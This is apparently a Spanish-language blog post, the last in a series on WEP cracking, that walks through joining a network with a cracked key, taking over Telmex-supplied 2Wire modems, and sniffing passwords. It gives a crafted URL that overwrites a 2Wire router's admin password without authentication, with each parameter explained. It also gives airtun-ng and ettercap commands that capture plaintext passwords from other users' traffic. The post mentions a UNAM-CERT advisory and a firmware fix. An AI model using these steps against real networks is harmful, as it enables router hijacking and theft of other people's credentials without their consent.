Ya desciframos la clave WEP de una red, ya nos podemos asociar y pedir ser parte de la red, sin embargo aún no acabamos, de hecho a partir de aquí viene lo más interesante; Cracking del Modem/AP 2Wire, monitorización de la red (sniffing), búsqueda de contraseñas, etc.

Este es el tercero y último artículo de una serie relacionados con el WEP Cracking usando una tarjeta Intel Pro/Wireless 2200.

Relación de Artículos:

• Parte 1: IPW2200 con soporte para Inyección.
• Parte 2: WEP Cracking.
• Parte 3: 2Wire Hacking y Monitoreo de Red.

Para este procedimiento estoy usando GNU/Linux Debian en su rama inestable, usando un kernel. 2.6.22.

Ser parte de la red

Ya que tenemos la clave WEP, es muy fácil ser parte de la red y pedirle al Access Point que nos asigne una IP válida para la red privada de la siguiente forma:

iwconfig eth1 essid "APTARGET" key 1234567890 channel 1
dhclient eth1

dhclient nos va a dar una respuesta parecida a la siguiente:

Listening on LPF/eth2/00:15:00:10:fb:6c
Sending on   LPF/eth2/00:15:00:10:fb:6c
Sending on   Socket/fallback
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 8
DHCPOFFER from 192.168.1.254
DHCPREQUEST on eth1 to 255.255.255.255 port 67
DHCPACK from 192.168.1.254
bound to 192.168.1.10 -- renewal in 40633 seconds.

Hay que poner atención en la IP que nos señala la linea "DHCPACK", ya que generalmente esa IP es el Access Point.

2Wire Cracking

Telmex es el mayor proveedor de servicios de banda ancha en México, y ellos mismos distribuyen a sus clientes equipos 2Wire inalámbricos que funcionan como modem ADSL y Access Point.

Estos equipos tienen un grave error de seguridad que aún no ha sido solucionado por parte de Telmex, y que nos permite reasignar las contraseñas del usuario de nivel administrativo del Modem/AP 2Wire. Para más información, favor de consultar el documento "Vulnerabilidad de autenticación en ruteadores 2Wire" del departamento de seguridad de la UNAM

Para lograr reescribir la contraseña administrativa a un equipo 2wire, basta con poner un URL armada de la siguiente forma en nuestro navegador favorito.

http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=admin&PASSWORD_CONF=admin&HINT=admin

Básicamente funciona de la siguiente forma:

• 192.168.1.254: IP del equipo 2Wire.
• PAGE: Página a la que se llama.
• THISPAGE: De que página viene el POST.
• NEXTPAGE: Que página nos deberá mostrar.
• PASSWORD=admin: Asigno el password como "admin".
• PASSWORD_CONF=admin: Lo mismo con la confirmación de la contraseña.
• HINT=admin: Palabra clave para que no se nos olvide la contraseña.

Demasiado fácil para ser verdad, esperemos que Telmex tome cartas en el asunto lo antes posible, ya que existen muchísimos equipos vulnerables que podrían ser explotados por personas sin escrúpulos. En cuanto sepa algo sobre como corregir esta vulnerabilidad daré la noticia por medio de este mismo sitio.

UPDATE: Telmex ya se encuentra tomando cartas en el asunto, según se puede leer en UNAM-CERT:

El fabricante ha liberado una actualización de seguridad que soluciona las vulnerabilidades existentes en ruteadores 2wire descritas en esta Nota de Seguridad liberada por UNAM-CERT el 7 de diciembre de 2007. La más severa de las vulnerabilidades, encontrada por UNAM-CERT, permitía la modificación de la configuración del ruteador aún si tenía una contraseña asignada, según se describe en el documento Vulnerabilidad de autenticación en ruteadores 2Wire del DSC/UNAM-CERT, y que estaba siendo utilizada para ataques de tipo Pharming.

Por lo que deberemos de verificar que la versión de nuestro firmware del equipo 2Wire sea igual o mayor a "5.29.135.5"

Password Sniffing con Ettercap

Este es uno de mis temas favoritos, trataremos de monitorear la red en búsqueda de contraseñas que viajen en texto plano. Para ello necesitamos de una aplicación llamada ettercap que como siempre, en Debian conseguir software es más que fácil.

apt-get install ettercap-gtk

Ahora tenemos un problema, rtap0 no es una interfase válida para ettercap, por lo que necesitaremos crear una interfase de tunel virtual, que se logra muy fácilmente de la siguiente forma:

airtun-ng -a 00:1A:2B:3C:4D:5E -w 1234567890 rtap0

Donde le especificamos a airtun-ng que por medio de rtap0 capture todos los paquetes que tengan que ver con el BSSID (MAC Address del AP) especificado, con una clave de desencriptación dado. Vamos a ver un mensaje similar al siguiente:

created tap interface at0
WEP encryption specified. Sending and receiving frames through rtap0.
FromDS bit set in all frames.

Que nos indica que se ha creado una nueva interfase de red llamada at0, con la cual ya podremos empezar a monitorear el tráfico en cuanto la activemos con el siguiente comando:

ifconfig at0 up

Ya de aquí tenemos dos opciones para empezar a usar ettercap ya sea por medio de su GUI:

ettercap -G

O por medio de la linea de comandos de la siguiente forma:

ettercap -Tq -i at0

Nota: Trataré de continuar con algunos ejemplos extras con otras herramientas de sniffing, por el momento solo les ofrezco el anterior con ettercap.

Espero que esta serie de artículos les sea de utilidad, y espero que podamos seguir compartiendo experiencias por medio de los comentarios.